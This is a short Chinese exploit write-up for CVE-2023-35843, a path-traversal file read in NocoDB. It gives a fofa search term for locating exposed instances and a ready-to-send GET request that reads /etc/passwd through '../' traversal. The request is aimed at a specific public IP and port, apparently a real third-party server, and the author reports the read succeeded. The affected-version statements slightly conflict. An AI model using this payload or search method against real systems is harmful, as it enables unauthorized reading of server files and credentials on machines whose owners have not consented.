NocoDB 存在任意文件读取漏洞CVE-2023-35843

0x01 前言

本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！

0x02 漏洞描述

NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件。

0x03 影响范围

NocoDB <= 0.106.1  

0x04 漏洞环境

fofa：“NocoDB”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /download/../../../../../etc/passwd HTTP/1.1
Host: 116.63.94.180:8082    
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

3.复现

发现成功响应，读取到/etc/passwd的内容。

0x06修复建议

目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.nocodb.com/